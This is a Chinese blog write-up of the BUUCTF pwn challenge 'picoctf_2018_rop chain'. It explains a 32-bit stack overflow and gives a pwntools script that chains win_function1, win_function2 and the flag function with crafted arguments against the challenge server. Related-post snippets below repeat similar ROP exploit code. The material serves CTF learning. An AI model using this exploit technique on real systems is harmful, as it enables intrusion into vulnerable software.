Buuctf(pwn) picoctf_2018_rop chain 栈溢出

最新推荐文章于 2023-04-04 22:11:12 发布
最新推荐文章于 2023-04-04 22:11:12 发布
阅读量291 收藏 2
点赞数 1
分类专栏: pwn题
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45556441/article/details/119811316
版权

在这里插入图片描述
32位,开启了NX保护
在这里插入图片描述
在这里插入图片描述在这里插入图片描述
在这里插入图片描述

利用思路

首先溢出后覆盖ret为function1函数地址,将win1赋值为1,之后跳转到function2的地址,a1是传入的参数,将a1传入即可满足条件去设置win2的值为1,之后去执行flag函数,if要满足的条件之前都设置好了,可以直接读出flag

from pwn import *
r = remote("node3.buuoj.cn", 26602)
win_function1 = 0x080485CB
win_function2 = 0x080485D8
flag = 0x0804862B
payload = "a" * (0x18+4)
payload += p32(win_function1)
payload += p32(win_function2) + p32(flag) + p32(0xBAAAAAAD) + p32(0xDEADBAAD)
r.sendlineafter("input> ", payload)
r.interactive()

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

半岛铁盒@
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
BUUCTFpicoctf_2018_rop chain(write up)
qq_44768749的博客
08-26 1183
BUUCTFpicoctf_2018_rop chain0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp关键代码说明 0x01 文件分析 32位程序,开启了栈不可执行、部分RELRO保护 0x02 运行 输入一串字符串,根据题名也知道需要构造ROP 0x03 IDA 主函数 vuln函数 漏洞点:没有限制输入字符串长度 flag函数 win_function1函数 win_function2函数 0x04 思路 flag函数为后门函数
BUUCTFPWNpicoctf_2018_rop chain
m0_55368674的博客
01-19 184
ret2text
buuctf PicoCTF_2018_rop_chain
FUCKING12的博客
02-22 3297
PicoCTF_2018_rop_chain 没什么好说的就是一个rop链构造 上代码 from pwn import * #node4.buuoj.cn:25469 #io=remote("node4.buuoj.cn",25469) io=process("./PicoCTF_2018_rop_chain") elf=ELF('./PicoCTF_2018_rop_chain') context.log_level='debug' #io.recvline("Enter your input>
[BUUCTF-pwn]——cmcc_simplerop (ropchain)
Y_peak的博客
03-16 450
[BUUCTF-pwn]——cmcc_simplerop栈溢出,自己找rop链,最简单的方法,让ROPgadget帮我们弄好呀,可是有点长,所有需要我们修改。毕竟有长度要求。因为“/bin/sh"字符串没有找到,所有这之前的都不动, 下面的pop eax; pop ebx; pop ecx; pop edx除了pop ebx 注意下,其他都可以进行修改 inc就是 ++ exploit 目的:使得excve("/bin/sh") eax = 0xb; ebx ->"/bin/sh"; ecx
picoctf_2018_rop_chain
z1r0的博客
12-09 248
picoctf_2018_rop_chain 查看保护 有溢出。 发现了一个flag函数,只需要满足win1不为0和win2不为0和a1=0xdeadbaad即可get flag。 又发现了两个函数,分析一下即可知道是设置win1和win2值的函数 rop的话先放win1这个函数,接着放win2这个函数,win2有参数,满足a1=0xbaaaaad就行。 最后win1和win2都不为0之后flag这个函数有一个a1参数,让a1参数过一下if就行。 构造rop的话注意一下32位的调用:调用函数地址-
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
【标题】"PWN.rar" 是一个包含与 AVR 单片机、PWM 脉冲输出、GPS 和 FPGA 相关资源的压缩包。其中,"AVR_PWM_GPS_FPGA_PWN_avr_avr_pwn" 可能是项目或文件集合的命名,暗示了这些技术的综合应用。 【描述】描述指出...
pwn学习资料整理——ROP技术(pwn_rop1)
08-30
pwn学习资料整理——ROP技术(pwn_rop1)
PWM.rar_ARM7 汇编_PWN_pwm arm7
09-22
在ARM7处理器上实现PWM接口,需要理解ARM7架构、汇编语言以及PWN的具体工作原理。 ARM7是ARM公司设计的一系列32位RISC微处理器,以其低功耗、高性能和广泛应用而闻名。在ARM7处理器中,开发者可以使用C语言或汇编...
pwn学习资料整理——ROP技术(pwn_rop2)
08-30
pwn学习资料整理——ROP技术(pwn_rop2)
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
PicoCTF_2018_rop_chain
m0sway的博客
11-24 631
PicoCTF_2018_rop_chain 使用checksec查看: 只开启了栈不可执行,放入IDA中查看: 主函数中直接给出了漏洞函数,跟进查看: 很明显gets()函数存在一个栈溢出,距离ebp0x18 查看发现存在flag.txt字符串,跟进可以发现函数falg,: 将flag读入到了参数s里面,满足条件win1&&win2 &&a1==-59039827的条件,就能读出flag 找到win1赋值的函数: 发现win1已经被赋值1,可以不用管, 接着看wi
【网络安全】Rop绕过DEP和ASRL流程实例介绍
Walter的专栏
09-16 8219
本文主要介绍带DEP防护和ASLR功能的操作系统或软件如何被绕过,从而执行漏洞利用和攻击,其它相关知识领域请自行上网搜索。 1、工具软件 ImmunityDebugger1.85 mona 插件 python 2.7.1 vulnserver win7虚拟机开启所有程序的DEP防护并运行vulnserver,ip 192.168.254.154 kali1.0虚拟机执行攻击脚本,ip
【4.29安恒杯】writeup
热门推荐
wintersun的地带
04-19 1万+
#### 安恒杯_writeup 以下为比赛中做出的题目MISC: SHOW ME THE FLAGCRYPTO: LAZYATTACK这一题很巧,全部的队伍里面只有我们一个队伍将其做出来。 这一题做出来完完全全是靠运气,在当我做出这一题的时候感觉是懵逼的,完全不知道是怎么回事,flag一下子就出来了而且对了,很兴奋。队友都相互说用了和出题人同一个软件,才得到的答案。结果确实是和出题人用
一种比较麻烦的Rop链构造——ret2dlresolve
dydxdz的博客
04-09 3788
ret2resolve 题目:0ctf 2018 babystack 上周末做了TCTF(0ctf 2018)的新人赛,题目难度适中,但垃圾如我一如既往没有做出几道题。在7o8v大佬的帮助下,弄懂了babystack的考察点和ret2resolve的利用原理,因此对照着wp记录一波。 0x01 ret2dlresolve原理 当一个程序第一次调用libc中的函数时,必须首先对libc中...
rop and rop2 wp
zszcr的博客
04-02 512
题目来源:国外的一个ctf平台https://hackme.inndy.tw/ rop题目提示:ROP buffer overflow 很明显是一个栈溢出 要用rop来获取shell防护机制发现至开启了NX 拖到IDA反编译一下 可以看到有很多函数 ,不管是用到的还是没用的都有,说明它的是静态连接我们可以通过ROPgadget 来直接构造ropchain命令为 ROPgadget --binary...
CMCC--simplerop 题解
lifanxin的博客
03-28 1551
Write Up文件信息漏洞定位利用分析wp总结 文件信息   该样本是我在做BUUCTF上的题刷到的,该题目本身漏洞明显,利用起来也不算太难,不过在我查阅一下他人的wp后发现了多种解法,在这里做个记录和总结。   老规矩先来检查一下文件的信息,32位小端程序,且只开启了NX保护。 漏洞定位 程序本身采用的是静态链接,所以用IDA进行分析的时候会发现.text段中的函数特别多,当然这本身也是为了配合题目给出的提示方便我们利用这么多的gadgets构造ROP链。 然后我们在IDA中定位到main函数,可以
picoctf_2018_rop chain
个人笔记
04-04 112
3,发现flag.txt被打开,但是要满足条件2的三个&关系才能被打印出来,win1和win2都有对应函数赋值。win2函数的a1未-1163220307,需要控制。win1直接赋值1,不需要控制参数。到ret偏移= 0x18+0x4。
buuctf pwn wp(第八波)学会利用ROPgadget
月阴荒的博客
04-22 1599
inndy_rop 简单利用ROPgadget https://www.cnblogs.com/bhxdn/p/12347296.html
PWN基础之构造ROP链(基本ROP
weixin_46132162的博客
02-02 4143
​随着 NX 保护的开启,以往直接向栈或者堆上直接注入代码的方式难以继续发挥效果。攻击者们也提出来相应的方法来绕过保护,目前主要的是(Return Oriented Programming),其主要思想是在**栈缓冲区溢出的基础上,利用程序中已有的小片段 (gadgets) 来改变某些寄存器或者变量的值,从而控制程序的执行流程。**所谓 gadgets 就是以 ret 结尾的指令序列,通过这些指令序列,我们可以修改某些地址的内容,方便控制程序的执行流程。
buuctf [HarekazeCTF2019]baby_rop2
最新发布
09-30
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2是一个pwn题目。在这个题目中,主要的目标是获取read函数的地址,并利用该地址泄漏libc基址,然后计算system函数和/bin/sh字符串的地址,最终执行system('/bin/sh')获取...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

半岛铁盒@

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值